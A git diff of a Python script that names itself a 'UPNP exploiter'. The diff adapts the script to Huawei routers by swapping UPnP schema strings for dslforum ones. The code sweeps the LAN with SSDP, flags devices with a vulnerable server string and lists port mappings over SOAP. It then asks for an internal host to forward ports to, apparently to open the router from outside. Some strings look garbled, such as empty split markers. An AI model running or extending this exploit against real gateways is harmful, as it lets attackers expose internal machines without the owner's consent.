diff --git a/upnp.py b/upnp.py
index d1e16f6..49d37f1 100644
--- a/upnp.py
+++ b/upnp.py
@@ -1,3 +1,4 @@
+"""Adapted the code to make a Huawei version that uses dslforum schemas"""
#!/bin/python
import urllib2, re, sys, select, socket
@@ -7,6 +8,12 @@
tport = 49170;
upnport = 1900;
msg = "M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nST: ssdp:all\r\nMAN: \"ssdp:discover\"\r\nMX: 1\r\n\r\n";
+welcome_msg = """##########################
+# UPNP exploiter #
+# By: Anarchy Angel #
+# www.dc414.org #
+# Happy hacking :) #
+##########################""";
###
# Used to ping one target.
@@ -35,7 +42,7 @@ def target():
while True:
string, addr = s.recvfrom(1024);
data.append([addr[0], string]);
- print "Got some data";
+ print "Got some data from %s" % addr[0];
except KeyboardInterrupt:
s.close();
proc(data);
@@ -59,7 +66,7 @@ def lan():
string, addr = res[0][0].recvfrom(1024);
#data += string;
data.append([addr[0], string]);
- print "Got some data";
+ print "Got some data from %s" % addr[0];
except KeyboardInterrupt:
s.close();
proc(data);
@@ -76,10 +83,11 @@ def sploit(host):
print "Trying to get some info from the target...";
try:
res = urllib2.urlopen(host).read();
+ print "Connected"
res = res.replace("\r", "");
res = res.replace("\n", "");
res = res.replace("\t", "");
- pres = res.split("urn:upnp-org:serviceId:WANIPConn1");
+ pres = res.split("urn:dslforum-org:serviceId:WANIPConn1");
p2res = pres[1].split("");
p3res = p2res[0].split("");
ctrl = p3res[1];
@@ -93,8 +101,9 @@ def sploit(host):
try:
while True:
opmsg = ''+str(i)+'';
+ ctrl = p3res[1];
open_ports = urllib2.Request("http://"+rhost[1]+""+ctrl, opmsg);
- open_ports.add_header("SOAPACTION", '"urn:schemas-upnp-org:service:WANIPConnection:1#GetGenericPortMappingEntry"');
+ open_ports.add_header("SOAPACTION", '"urn:dslforum-org :service:WANIPConnection:1#GetGenericPortMappingEntry"');
open_ports.add_header('Content-type', 'application/xml');
open_res = urllib2.urlopen(open_ports).read();
int1 = open_res.split('');
@@ -112,9 +121,9 @@ def sploit(host):
print intport+":"+extport+":"+address+":"+desc
i=i+1;
except Exception, e:
- err=""
+ print e
except Exception, e:
- #print e;
+ print e;
print "Failed to get anything from the target :/"
IP = raw_input("IP of internal host to forward posts to: [192.168.1.100] ");
if IP == "":
@@ -207,8 +216,8 @@ def proc(data):
url = "http://"+host+":";
port = re.findall("http:\/\/[0-9\.]+:(\d.+)", hdata);
url += port[0];
- p = urllib2.urlopen(url, timeout=3);
- rd = re.findall("schemas-upnp-org:device:([^:]+)", p.read());
+ p = urllib2.urlopen(url, timeout=5);
+ rd = re.findall("dslforum-org:device:([^:]+)", p.read());
if rd[0] == "InternetGatewayDevice":
addr = re.findall("http://([^:]+)", url);
vuln = "Linux/2.6.17.WB_WPCM450.1.3 UPnP/1.0, Intel SDK for UPnP devices/1.3.1";
@@ -236,12 +245,7 @@ def done(data):
# Welcome msg
###
print "";
- print "##########################";
- print "# UPNP exploiter #";
- print "# By: Anarchy Angel #";
- print "# www.dc414.org #";
- print "# Happy hacking :) #";
- print "##########################";
+ print welcome_msg
exit(1);
for info in data:
# if sys.argv[1] == "target":
@@ -257,12 +261,7 @@ def done(data):
###
# Welcome msg
###
- print "##########################";
- print "# UPNP exploiter #";
- print "# By: Anarchy Angel #";
- print "# www.dc414.org #";
- print "# Happy hacking :) #";
- print "##########################";
+ print welcome_msg
exit(1);
###
@@ -272,12 +271,7 @@ def usage():
###
# Welcome msg
###
- print "##########################";
- print "# UPNP exploiter #";
- print "# By: Anarchy Angel #";
- print "# www.dc414.org #";
- print "# Happy hacking :) #";
- print "##########################";
+ print welcome_msg
print "";
print "upnp.py type ip";
print "Types: lan/target";